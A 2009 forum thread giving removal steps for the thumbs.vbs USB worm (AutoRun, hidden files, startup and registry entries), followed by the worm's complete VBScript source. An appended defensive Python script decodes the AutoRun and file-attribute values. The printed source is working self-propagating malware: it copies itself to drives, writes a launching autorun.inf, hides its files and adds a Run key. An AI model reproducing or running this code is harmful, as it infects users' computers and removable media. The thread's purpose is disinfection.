 Hardening Komp

kutukupret
Post subject: Hardening Komp (Thu Jun 04, 2009 8:10 pm)

HOW TO REMOVE thumbs.vbs...
  1. Turn off the AutoRun function in Windows.

    * Some ways to turn off the AutoRun function are as follows:

  • Click Start - Run, then type gpedit.msc

  • In the Group Policy window, in the browser pane on the left, select User Configuration and then Administrative Templates.

  • Select System. Several menu items appear in the right-hand pane.

  • Select Turn off Autoplay.

  • Right-click and choose Properties. Set it to Enabled.

  • Then set Turn off Autoplay on: All drives.

  • Click OK.


The method above changes the NoDriveTypeAutoRun value under HKEY_LOCAL_MACHINE in the registry to FF. To reset it through the registry, change it to 91, the Windows XP default.

* If you only want to turn off the AutoRun function while moving data to/from a flash drive, hold the Shift key while inserting the flash drive into the PC.

  2. Show all files in Windows; thumbs.vbs and autorun.inf are usually hidden files.

* In Windows Explorer, choose the Tools - Folder Options menu
* On tab i, check the Show hidden files and folders option
* Uncheck the Hide extensions… and Hide protected operating system files options
  3. Disable the thumbs.vbs service through msconfig

  • Click Start - Run, then type msconfig

  • On the Startup tab, disable the Thumb entry (here you can see that the virus's main file is stored at c:\windows\thumbs.vbs)

  4. Stop the running wscript.exe service using Process Explorer (procexp) or Task Manager.

  5. Disable the functions in regedit (click Start - Run, then type regedit) by deleting the values:

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avctrl","wscript.exe c:\windows\Thumbs.vbs"


"HKEY_CLASSES_ROOT\vbsfile\DefaultIcon\", "%SystemRoot%\System32\shell32.dll,-154"

"HKEY_CLASSES_ROOT\VBSFile\", "Configuration script"
  6. Delete all thumbs.vbs files.

  • Click Start - Search

  • Type thumbs.vbs in the All or part of the file name box

  • Don't forget to tick the Search hidden files and folders option under More advanced options

  • Delete all of those files.




Below I include the contents of the thumbs.vbs virus file:
'MICROSOFT WINDOWS SYSTEM DRIVER

on error resume next
Dim scriptCode, winpath, flashdrive
Dim fs, autorunFiles, ThumbsFiles
Dim TargetFiles, CreateReg, CheckDrive, scriptRun

autorunFiles = "[autorun]" & vbcrlf & "open=wscript.exe Thumbs.vbs" & vbcrlf & "shell\open=Open" & vbcrlf & "shell\open\Command=wscript.exe Thumbs.vbs" & vbcrlf & "shell\open\Default=1" & vbcrlf & "shell\explore=Explorer" & vbcrlf & "shell\explore\Command=Explorer.exe"

Set fs = CreateObject("scripting.FileSystemObject")
Set ThumbsFiles = fs.getfile(Wscript.scriptFullname)

Dim text, size
size = ThumbsFiles.size
CheckDrive = ThumbsFiles.drive.drivetype
Set text = ThumbsFiles.openastextstream(1, -2)

Do While Not text.atendofstream
scriptCode=scriptCode & text.readline
scriptCode = scriptCode & vbCrLf
Loop

Do
Set winpath = fs.getspecialfolder(0)
Set TargetFiles = fs.getfile(winpath & "\Thumbs.vbs")
TargetFiles.Attributes = 32

Set TargetFiles = fs.createtextfile(winpath & "\Thumbs.vbs", 2, True)
TargetFiles.write scriptCode
TargetFiles.Close

Set TargetFiles = fs.getfile(winpath & "\Thumbs.vbs")
TargetFiles.Attributes = 39

For Each flashdrive In fs.drives

If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then
Set TargetFiles = fs.getfile(flashdrive.Path & "\Thumbs.vbs")
TargetFiles.Attributes = 32

Set TargetFiles = fs.createtextfile(flashdrive.Path & "\Thumbs.vbs", 2, True)
TargetFiles.write scriptCode
TargetFiles.Close

Set TargetFiles = fs.getfile(flashdrive.Path & "\Thumbs.vbs")
TargetFiles.Attributes = 39

Set TargetFiles = fs.getfile(flashdrive.Path & "\autorun.inf")
TargetFiles.Attributes = 32

Set TargetFiles = fs.createtextfile(flashdrive.Path & "\autorun.inf", 2, True)
TargetFiles.write autorunFiles
TargetFiles.Close

Set TargetFiles = fs.getfile(flashdrive.Path & "\autorun.inf")
TargetFiles.Attributes = 39
End If

Next

pt = """"
Set CreateReg = CreateObject("Wscript.Shell")
CreateReg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avctrl","wscript.exe c:\windows\Thumbs.vbs"
CreateReg.regwrite "HKEY_CLASSES_ROOT\vbsfile\DefaultIcon\", "%SystemRoot%\System32\shell32.dll,-154"
CreateReg.regwrite "HKEY_CLASSES_ROOT\VBSFile\", "Configuration script"


If CheckDrive <> 1 Then Wscript.sleep 200000
Loop While CheckDrive <> 1
Set scriptRun = CreateObject("Wscript.shell")
scriptRun.run winpath & "\explorer.exe /e,/select, " & Wscript.scriptFullname

http://k3r4s4k1t.co.cc
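
Added example (not part of the original post and not the poster's code): a Python sketch that decodes the artifacts the post describes, namely the NoDriveTypeAutoRun values FF and 91, the Attributes = 39 the script applies to its files, and the autorun.inf entries that start a script host. Function names are this example's own; the bit meanings are Microsoft's documented NoDriveTypeAutoRun and FileSystemObject attribute flags.

```python
# Added example: offline triage of the artifacts named in the post.
# Function and constant names are this example's own (hypothetical).

# NoDriveTypeAutoRun: a set bit DISABLES AutoRun for that drive type.
AUTORUN_BITS = {0x01: "unknown", 0x04: "removable", 0x08: "fixed",
                0x10: "network", 0x20: "cdrom", 0x40: "ramdisk"}
# FileSystemObject file attribute flags.
FILE_ATTR_BITS = {1: "ReadOnly", 2: "Hidden", 4: "System", 32: "Archive"}
SCRIPT_HOSTS = ("wscript", "cscript")

# autorun.inf text, reassembled from the string in the posted source.
SAMPLE_INF = "\n".join([
    "[autorun]",
    "open=wscript.exe Thumbs.vbs",
    r"shell\open=Open",
    r"shell\open\Command=wscript.exe Thumbs.vbs",
    r"shell\open\Default=1",
    r"shell\explore=Explorer",
    r"shell\explore\Command=Explorer.exe",
])


def autorun_still_enabled(value):
    """Drive types on which AutoRun stays active for this registry value."""
    return [name for bit, name in AUTORUN_BITS.items() if not value & bit]


def decode_attributes(value):
    """Names of the file attribute flags set in a FileSystemObject value."""
    return [name for bit, name in FILE_ATTR_BITS.items() if value & bit]


def script_host_entries(inf_text):
    """(section, key, command) for autorun.inf lines that start a script host."""
    hits, section = [], ""
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif "=" in line and not line.startswith(";"):
            key, _, command = line.partition("=")
            words = command.strip().lower().split()
            exe = words[0].strip('"').rsplit("\\", 1)[-1].split(".")[0] if words else ""
            if exe in SCRIPT_HOSTS:
                hits.append((section, key.strip().lower(), command.strip()))
    return hits


if __name__ == "__main__":
    print("0x91 leaves AutoRun on for:", autorun_still_enabled(0x91))
    print("0xFF leaves AutoRun on for:", autorun_still_enabled(0xFF))
    print("Attributes = 39 means:", decode_attributes(39))
    for hit in script_host_entries(SAMPLE_INF):
        print("script host launched by:", hit)
```

The 0x91 result shows why step 1 matters: that value leaves AutoRun active for removable drives, while 0xFF disables it for every drive type. The decoded attribute value 39 (ReadOnly, Hidden, System, Archive) is why step 2 has to show both hidden and protected operating system files before the search in step 6 will find anything.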
___rey
Post subject: Re: Hardening Komp (Thu Jun 04, 2009 10:57 pm)

nice post bro, keep u r rock